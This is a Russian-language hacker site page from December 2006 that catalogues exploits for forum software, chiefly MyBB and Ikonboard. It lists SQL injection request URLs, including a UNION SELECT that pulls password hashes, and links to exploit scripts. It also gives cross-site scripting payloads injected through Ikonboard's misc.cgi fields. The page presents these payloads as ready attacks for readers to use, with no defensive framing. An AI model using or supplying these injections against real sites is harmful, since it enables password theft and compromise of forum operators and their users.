30 Декабря 2006 - DoZZer Hacker

Меню сайта
Index proXy Coded/Encoded YaBB BUG MyBB BUG phpBB BUG Ikonboard BUG Phorum BUG IPB BUG vBulletin BUG mssql injection mysql injection Root FreeBSD Joomla & Mambo BUG

Календарь новостей

Форма входа

Поиск по новостям

Друзья сайта
Forum.antichat.ru онлайн планшет

Начало

Регистрация

Вход

Новости сайта

Главная страница » 2006 » Декабрь » 30

MyBB BUG

MyBB <= 1.00 RC4

SQL Injection Exploit
Exploit:

http://milw0rm.org/exploits/1022

http://milw0rm.org/exploits/1172

MyBB 1.0.2

Название префикса таблиц

Код:

http://www.example.com/search.php?s=[de1aaf9b]&action=do_search&keywords=a&srchtype=3

MyBB 1.03

SQL-иньекция

Код:

http://www.example.com/moderation.php?posts=[pid]|[code]&tid=[pid]&action=do_multimerg

eposts&sep=hr

MyBB <= 1.04

SQL-иньекция
Exploit:

http://www.security.nnov.ru/files/mybbex.pl

MyBB <= 1.1.2

SQL-иньекция

Код:

http://www.example.com/index.php?referrer=9999999999'%20UNION%20SELECT%20

password,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2

,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ... Читать дальше »

Просмотров: 2920 | Добавил: dozzer | Дата: 2006-12-30 | Комментарии (0)

Ikonboard BAG

Ikonboard 2.1.7b

Уязвимость позволяет просмотривать

PHP код:

video: http://video.antichat.ru/file42.html

Ikonboard 2.1.9 RussianFullPack

Уязвимость в Ikonboard позволяет удаленному пользователю выполнить XSS нападение
Уязвимость найдена в скрипте misc.cgi в форуме Ikonboard 2.1.9 в полях "aimname" и "UIN"

PHP код:
<br /> misc.cgi?action=aim&aimname=< script>javascript:alert('Sn@k3')< /script>

PHP код:
<br /> misc.cgi?action=icq&UIN=< script>javascript:alert('Sn@k3')< /script> <br>

Просмотров: 12928 | Добавил: dozzer | Дата: 2006-12-30 | Комментарии (25)